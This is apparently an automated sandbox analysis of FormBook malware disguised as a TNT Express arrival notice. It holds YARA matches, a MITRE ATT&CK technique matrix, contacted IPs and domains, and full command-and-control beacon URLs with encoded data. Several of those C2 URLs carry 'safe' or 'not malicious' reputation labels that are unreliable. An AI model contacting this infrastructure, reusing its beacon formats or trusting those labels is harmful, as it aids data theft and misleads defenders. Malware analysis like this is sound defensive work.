0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Binary or memory string: WIN_XPe
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Binary or memory string: WIN_VISTA
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Binary or memory string: WIN_7
Source: TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3833798452.00000000053B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3831474981.0000000004D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3829546280.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3831474979.00000000032E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3819445354.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1574766006.0000000008750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1563175815.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1564791903.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_00941204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00941204
Source: C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	Code function: 0_2_00941806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00941806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	71%	ReversingLabs	Win32.Trojan.Strab
TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	37%	Virustotal		Browse
TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
natroredirect.natrocdn.com	0%	Virustotal	Browse
7ddw.top	0%	Virustotal	Browse
ahabet.asia	0%	Virustotal	Browse
time.windows.com	0%	Virustotal	Browse
www.7ddw.top	0%	Virustotal	Browse
www.4u2b.online	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://securepubads.g.doubleclick.net/tag/js/gpt.js	0%	Avira URL Cloud	safe
http://www.4u2b.online/mm8l/?wLTtn0=QJHPEyd/9nGk0pWFnTVCTHVJEZeUTkkF6sY+O24D8hqBfRocJb7yxCDA6KFINoFi4IC1nHRAbEj+/fbu8m+QV1lpDHaccqqOhwbUbbUBhji0hskW+bSOHo9JJy3p6Ubdn+lA5+hwokaA&K4G=Thy4J4VXH8ud	0%	Avira URL Cloud	safe
http://www.meetfactory.biz/m6nq/	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://securepubads.g.doubleclick.net/tag/js/gpt.js	0%	Virustotal		Browse
http://www.meetfactory.biz/m6nq/	0%	Virustotal		Browse
http://www70.ytonetgearhub.shop/	0%	Avira URL Cloud	safe
http://www.keswickstream.online/8yn3/	0%	Avira URL Cloud	safe
http://www.ytonetgearhub.shop/l8y2/?wLTtn0=N7+ErdMNi9jLXETIvOCQ72nB9fpjFBOAyZNeO0Rg3M8w3pAJDP1ag+bhPLbHl+sxFhu1gT5MnEPxV82xgAHVuybS9IiKiGQkxKNSomt8mrNqSTPrwHmQNW0cpyJUmmeq46PNHGSVyG+Q&K4G=Thy4J4VXH8ud	0%	Avira URL Cloud	safe
http://www.6666580a9.shop/6ujs/?wLTtn0=yJkjCVuH35Z3Y4uWL4mXIpKsUoOhw5Ntfm93bfMPuqWkl8sQ3LA1Sv6pqP1navOonkOYgjHPfG96mMYvY8eBIuOm214hMSjoqIkQFvMydMaNRvs9I/qBWmD1+lOL1Msb2HletZybPt30&K4G=Thy4J4VXH8ud	0%	Avira URL Cloud	safe
http://www.6666580a9.shop/6ujs/	0%	Avira URL Cloud	safe
http://www.ytonetgearhub.shop/l8y2?gp=1&js=1&uuid=1722923892.9737034374&other_args=eyJ1cmkiOiAiL2w4e	0%	Avira URL Cloud	safe
http://www.iqejgn.asia/9rz8/	0%	Avira URL Cloud	safe
http://www.moodplay.store	0%	Avira URL Cloud	safe
http://4u2b.online/mm8l/?wLTtn0=QJHPEyd/9nGk0pWFnTVCTHVJEZeUTkkF6sY	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://www.gloryastore.site/w66n/?K4G=Thy4J4VXH8ud&wLTtn0=JNMn5wU33n82w51+xRzP3FlJSWcCaURVt+q7Pzr5OEhwI1ARCPGXZ34z1Qjm/zGtz6t2DMTKfskelbcwOWJ0KoKtKPXvtVz2A+q24UxvxXdwB5cNRWCJTn4Hp/JjmuKwWpo8eZEk+KzL	0%	Avira URL Cloud	safe
http://www.7ddw.top/rjww/	0%	Avira URL Cloud	safe
http://www.zippio.top/vqrt/?K4G=Thy4J4VXH8ud&wLTtn0=D/CAr8v9sBwvGeAKv008oI0MjkBGAgxM5KXsmTnzco65i9w0O1N9X/hR5jUEVoZZmkU0lOgyZlyiO279G0EZ3YYBGdvyfs1xlWPG3pHzKgtCQbUQmbM2bRnHZTpJhRrpw4VoqiQ7Sy5/	0%	Avira URL Cloud	safe
http://www.mtmoriacolives.store/bkj6/?wLTtn0=8+n74ICH5t2dNKQX6lGuEwogKdFcm+efCN+AaJVQ/oTJ/vS0JBNmwd2cButyC47RBhZlYQKvXK9jQKf8mEf8lv7WjUOFxC32M8Dim1Z9UGO50WC+y5zJBQxNdJ1dbpIzCXRAAg7Lwi8E&K4G=Thy4J4VXH8ud	0%	Avira URL Cloud	safe
http://www.moodplay.store/utgc/	0%	Avira URL Cloud	safe
http://www.izen.group/b7sv/?wLTtn0=w7j+gD0yrGg+rgg3b6bLH7LoNFIL2ZRfENl9mqI9AC3R/98OKlGHnvaLbHep/+eemtfpjPP4Y6n9+8uf6pj6QD92ZXReQewt6rCbHY9ZCpeEqDf5+CBDawRdjYLjTy83wviiXvFDQD/z&K4G=Thy4J4VXH8ud	0%	Avira URL Cloud	safe
http://keswickstream.online/8yn3/?wLTtn0=U19dcxmn6Ob5yxqWvQsW%20QP5HF1VJp%2FR08%2FTqyg6Y00c2I58wx0m%	0%	Avira URL Cloud	safe
http://www.ahabet.asia/u6by/	0%	Avira URL Cloud	safe
http://www70.meetfactory.biz/	0%	Avira URL Cloud	safe
http://www.4u2b.online/mm8l/	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://www70.meetfactory.biz/	0%	Virustotal		Browse
http://www.4u2b.online/mm8l/	0%	Virustotal		Browse
http://tilda.cc	0%	Avira URL Cloud	safe
https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.js	0%	Avira URL Cloud	safe
http://www.ytonetgearhub.shop/l8y2/	0%	Avira URL Cloud	safe
https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.js	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
http://www.smashcoin.club/9g78/	0%	Avira URL Cloud	safe
https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.js	0%	Virustotal		Browse
http://tilda.ws/img/logo404.png	0%	Avira URL Cloud	safe
https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.js	0%	Virustotal		Browse
https://cdnjs.cloudflare.com/ajax/libs/gsap/1.20.2/TweenMax.min.js	0%	Avira URL Cloud	safe
http://www.keswickstream.online/8yn3/?wLTtn0=U19dcxmn6Ob5yxqWvQsW+QP5HF1VJp/R08/Tqyg6Y00c2I58wx0m/NKkc0ysAREJ2Ci+Jjsm2cVr9QKi8fHV5UgR9LrsAxuveq5wSVQj9G/u0V6Yivcjv0tzcPmEGWRNPAX/WIcmzgPK&K4G=Thy4J4VXH8ud	0%	Avira URL Cloud	safe
https://ventraip.com.au/favicon.ico	0%	Avira URL Cloud	safe
http://www.mtmoriacolives.store/bkj6/	0%	Avira URL Cloud	safe
http://www.meetfactory.biz/m6nq?gp=1&js=1&uuid=1722923852.0095214278&other_args=eyJ1cmkiOiAiL202bnEi	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/gsap/1.20.2/TweenMax.min.js	0%	Virustotal		Browse
http://tilda.ws/img/logo404.png	0%	Virustotal		Browse
http://www.iqejgn.asia/9rz8/?wLTtn0=1tNn+IIyVW1A+sqKfEQy04NS/ZRVpIAq0YPUAX7Hfg7Vkl0yzx5JyzOVFmasMRZI7I9GTVzgvvzAn0zvpweIE6n4FW+v1Etr1hIa7dN5V1blzPzjU/O8FybgPZzZOf2wgBLswD1Be9R7&K4G=Thy4J4VXH8ud	0%	Avira URL Cloud	safe
http://www.izen.group/b7sv/	0%	Avira URL Cloud	safe
https://ventraip.com.au/favicon.ico	0%	Virustotal		Browse
http://www.ayypromo.shop/6ocx/?wLTtn0=hijuOzLOQlrNWhILDNjeC2OH6zMrFQvwuW3+4wEUbqCXhGLxNrCetU+rFrrSd83NXlirQtkmZIjYEy1tPN82iVSiaciSCzMEBxKMdwnmzNSLD956QarfOOVQaIraEhcGUwHoQWWdHKAj&K4G=Thy4J4VXH8ud	0%	Avira URL Cloud	safe
https://gamesfunny.top$	0%	Avira URL Cloud	safe
http://www.7ddw.top/rjww/?K4G=Thy4J4VXH8ud&wLTtn0=21zhRHunkB6shXZDfVa1IsVwudiixK5d3l6Vv+2nLWpIaLBNoWu9aD0tgf5vArfoCL+2Np1WrTWVfntjgCU3jUG2yRIwUncgKO1dl+GE08PDbgeYNYZmHf3Eb1jWzI45ZCCGJ+uwj6f0	0%	Avira URL Cloud	safe
https://badges.ausowned.com.au/07634	0%	Avira URL Cloud	safe
http://tilda.cc	1%	Virustotal		Browse
http://www.zippio.top/vqrt/	0%	Avira URL Cloud	safe
https://code.jquery.com/jquery-3.5.1.min.js	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css	0%	Avira URL Cloud	safe
http://www.moodplay.store/utgc/?wLTtn0=wywWfBrqEdu4Of0TGEXMpEnOank3eKh3frnML9uPnZ50Hwei4kKrO+8lS3f85dqDgJqwK6NjtdU1r4NauGv8+KUsgFrnvd2uJsLHZkaBWadbzfXU0G4TBiNKrnt/a6K4Cjqq35RngOKd&K4G=Thy4J4VXH8ud	0%	Avira URL Cloud	safe
https://www.iqejgn.asia/9rz8/?wLTtn0=1tNn	0%	Avira URL Cloud	safe
http://www.ayypromo.shop/6ocx/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.ayypromo.shop	176.57.64.102	true	false		unknown
www.iqejgn.asia	45.76.85.183	true	false		unknown
www.ytonetgearhub.shop	194.195.220.41	true	false		unknown
www.zippio.top	203.161.46.201	true	false		unknown
www.meetfactory.biz	45.33.30.197	true	false		unknown
www.keswickstream.online	178.63.50.103	true	false		unknown
natroredirect.natrocdn.com	85.159.66.93	true	false	0%, Virustotal, Browse	unknown
4u2b.online	141.94.102.188	true	false		unknown
www.izen.group	13.248.169.48	true	false		unknown
7ddw.top	154.23.184.207	true	false	0%, Virustotal, Browse	unknown
www.mtmoriacolives.store	103.42.108.46	true	false		unknown
ak7y10.tta88.com	64.64.253.144	true	false		unknown
smashcoin.club	68.183.37.14	true	false		unknown
ahabet.asia	198.54.126.42	true	false	0%, Virustotal, Browse	unknown
www.moodplay.store	104.21.17.191	true	false		unknown
time.windows.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.smashcoin.club	unknown	unknown	true		unknown
www.ahabet.asia	unknown	unknown	true		unknown
www.6666580a9.shop	unknown	unknown	true		unknown
www.4u2b.online	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.7ddw.top	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.kej-sii.cloud	unknown	unknown	true		unknown
www.gloryastore.site	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.meetfactory.biz/m6nq/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.4u2b.online/mm8l/?wLTtn0=QJHPEyd/9nGk0pWFnTVCTHVJEZeUTkkF6sY+O24D8hqBfRocJb7yxCDA6KFINoFi4IC1nHRAbEj+/fbu8m+QV1lpDHaccqqOhwbUbbUBhji0hskW+bSOHo9JJy3p6Ubdn+lA5+hwokaA&K4G=Thy4J4VXH8ud	false	Avira URL Cloud: safe	unknown
http://www.keswickstream.online/8yn3/	false	Avira URL Cloud: safe	unknown
http://www.ytonetgearhub.shop/l8y2/?wLTtn0=N7+ErdMNi9jLXETIvOCQ72nB9fpjFBOAyZNeO0Rg3M8w3pAJDP1ag+bhPLbHl+sxFhu1gT5MnEPxV82xgAHVuybS9IiKiGQkxKNSomt8mrNqSTPrwHmQNW0cpyJUmmeq46PNHGSVyG+Q&K4G=Thy4J4VXH8ud	false	Avira URL Cloud: safe	unknown
http://www.6666580a9.shop/6ujs/?wLTtn0=yJkjCVuH35Z3Y4uWL4mXIpKsUoOhw5Ntfm93bfMPuqWkl8sQ3LA1Sv6pqP1navOonkOYgjHPfG96mMYvY8eBIuOm214hMSjoqIkQFvMydMaNRvs9I/qBWmD1+lOL1Msb2HletZybPt30&K4G=Thy4J4VXH8ud	false	Avira URL Cloud: safe	unknown
http://www.6666580a9.shop/6ujs/	false	Avira URL Cloud: safe	unknown
http://www.iqejgn.asia/9rz8/	false	Avira URL Cloud: safe	unknown
http://www.gloryastore.site/w66n/?K4G=Thy4J4VXH8ud&wLTtn0=JNMn5wU33n82w51+xRzP3FlJSWcCaURVt+q7Pzr5OEhwI1ARCPGXZ34z1Qjm/zGtz6t2DMTKfskelbcwOWJ0KoKtKPXvtVz2A+q24UxvxXdwB5cNRWCJTn4Hp/JjmuKwWpo8eZEk+KzL	false	Avira URL Cloud: safe	unknown
http://www.7ddw.top/rjww/	false	Avira URL Cloud: safe	unknown
http://www.zippio.top/vqrt/?K4G=Thy4J4VXH8ud&wLTtn0=D/CAr8v9sBwvGeAKv008oI0MjkBGAgxM5KXsmTnzco65i9w0O1N9X/hR5jUEVoZZmkU0lOgyZlyiO279G0EZ3YYBGdvyfs1xlWPG3pHzKgtCQbUQmbM2bRnHZTpJhRrpw4VoqiQ7Sy5/	false	Avira URL Cloud: safe	unknown
http://www.mtmoriacolives.store/bkj6/?wLTtn0=8+n74ICH5t2dNKQX6lGuEwogKdFcm+efCN+AaJVQ/oTJ/vS0JBNmwd2cButyC47RBhZlYQKvXK9jQKf8mEf8lv7WjUOFxC32M8Dim1Z9UGO50WC+y5zJBQxNdJ1dbpIzCXRAAg7Lwi8E&K4G=Thy4J4VXH8ud	false	Avira URL Cloud: safe	unknown
http://www.moodplay.store/utgc/	false	Avira URL Cloud: safe	unknown
http://www.izen.group/b7sv/?wLTtn0=w7j+gD0yrGg+rgg3b6bLH7LoNFIL2ZRfENl9mqI9AC3R/98OKlGHnvaLbHep/+eemtfpjPP4Y6n9+8uf6pj6QD92ZXReQewt6rCbHY9ZCpeEqDf5+CBDawRdjYLjTy83wviiXvFDQD/z&K4G=Thy4J4VXH8ud	false	Avira URL Cloud: safe	unknown
http://www.ahabet.asia/u6by/	false	Avira URL Cloud: safe	unknown
http://www.4u2b.online/mm8l/	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.ytonetgearhub.shop/l8y2/	false	Avira URL Cloud: safe	unknown
http://www.smashcoin.club/9g78/	false	Avira URL Cloud: safe	unknown
http://www.keswickstream.online/8yn3/?wLTtn0=U19dcxmn6Ob5yxqWvQsW+QP5HF1VJp/R08/Tqyg6Y00c2I58wx0m/NKkc0ysAREJ2Ci+Jjsm2cVr9QKi8fHV5UgR9LrsAxuveq5wSVQj9G/u0V6Yivcjv0tzcPmEGWRNPAX/WIcmzgPK&K4G=Thy4J4VXH8ud	false	Avira URL Cloud: safe	unknown
http://www.mtmoriacolives.store/bkj6/	false	Avira URL Cloud: safe	unknown
http://www.iqejgn.asia/9rz8/?wLTtn0=1tNn+IIyVW1A+sqKfEQy04NS/ZRVpIAq0YPUAX7Hfg7Vkl0yzx5JyzOVFmasMRZI7I9GTVzgvvzAn0zvpweIE6n4FW+v1Etr1hIa7dN5V1blzPzjU/O8FybgPZzZOf2wgBLswD1Be9R7&K4G=Thy4J4VXH8ud	false	Avira URL Cloud: safe	unknown
http://www.izen.group/b7sv/	false	Avira URL Cloud: safe	unknown
http://www.ayypromo.shop/6ocx/?wLTtn0=hijuOzLOQlrNWhILDNjeC2OH6zMrFQvwuW3+4wEUbqCXhGLxNrCetU+rFrrSd83NXlirQtkmZIjYEy1tPN82iVSiaciSCzMEBxKMdwnmzNSLD956QarfOOVQaIraEhcGUwHoQWWdHKAj&K4G=Thy4J4VXH8ud	false	Avira URL Cloud: safe	unknown
http://www.7ddw.top/rjww/?K4G=Thy4J4VXH8ud&wLTtn0=21zhRHunkB6shXZDfVa1IsVwudiixK5d3l6Vv+2nLWpIaLBNoWu9aD0tgf5vArfoCL+2Np1WrTWVfntjgCU3jUG2yRIwUncgKO1dl+GE08PDbgeYNYZmHf3Eb1jWzI45ZCCGJ+uwj6f0	false	Avira URL Cloud: safe	unknown
http://www.zippio.top/vqrt/	false	Avira URL Cloud: safe	unknown
http://www.moodplay.store/utgc/?wLTtn0=wywWfBrqEdu4Of0TGEXMpEnOank3eKh3frnML9uPnZ50Hwei4kKrO+8lS3f85dqDgJqwK6NjtdU1r4NauGv8+KUsgFrnvd2uJsLHZkaBWadbzfXU0G4TBiNKrnt/a6K4Cjqq35RngOKd&K4G=Thy4J4VXH8ud	false	Avira URL Cloud: safe	unknown
http://www.ayypromo.shop/6ocx/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	getmac.exe, 00000004.00000003.1752458219.00000000081CE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	getmac.exe, 00000004.00000003.1752458219.00000000081CE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://securepubads.g.doubleclick.net/tag/js/gpt.js	getmac.exe, 00000004.00000002.3833043675.0000000007172000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000004AF2000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www70.ytonetgearhub.shop/	hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000003B3E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ytonetgearhub.shop/l8y2?gp=1&js=1&uuid=1722923892.9737034374&other_args=eyJ1cmkiOiAiL2w4e	getmac.exe, 00000004.00000002.3833043675.00000000061BE000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000003B3E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	getmac.exe, 00000004.00000003.1752458219.00000000081CE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.moodplay.store	hoCcQGubWgo.exe, 00000006.00000002.3833798452.0000000005420000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://4u2b.online/mm8l/?wLTtn0=QJHPEyd/9nGk0pWFnTVCTHVJEZeUTkkF6sY	getmac.exe, 00000004.00000002.3833043675.0000000005E9A000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.000000000381A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	getmac.exe, 00000004.00000003.1752458219.00000000081CE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://keswickstream.online/8yn3/?wLTtn0=U19dcxmn6Ob5yxqWvQsW%20QP5HF1VJp%2FR08%2FTqyg6Y00c2I58wx0m%	getmac.exe, 00000004.00000002.3833043675.0000000006E4E000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.00000000047CE000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www70.meetfactory.biz/	hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000003688000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	getmac.exe, 00000004.00000003.1752458219.00000000081CE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tilda.cc	getmac.exe, 00000004.00000002.3833043675.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.00000000034F6000.00000004.00000001.00040000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.js	getmac.exe, 00000004.00000002.3833043675.0000000006674000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000003FF4000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.js	getmac.exe, 00000004.00000002.3833043675.0000000006674000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000003FF4000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	getmac.exe, 00000004.00000003.1752458219.00000000081CE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tilda.ws/img/logo404.png	getmac.exe, 00000004.00000002.3833043675.0000000005B76000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.00000000034F6000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/gsap/1.20.2/TweenMax.min.js	getmac.exe, 00000004.00000002.3833043675.0000000006674000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000003FF4000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	getmac.exe, 00000004.00000003.1752458219.00000000081CE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ventraip.com.au/favicon.ico	getmac.exe, 00000004.00000002.3835029456.0000000007EE0000.00000004.00000800.00020000.00000000.sdmp, getmac.exe, 00000004.00000002.3833043675.00000000064E2000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000003E62000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	getmac.exe, 00000004.00000003.1752458219.00000000081CE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.meetfactory.biz/m6nq?gp=1&js=1&uuid=1722923852.0095214278&other_args=eyJ1cmkiOiAiL202bnEi	getmac.exe, 00000004.00000002.3833043675.0000000005D08000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000003688000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
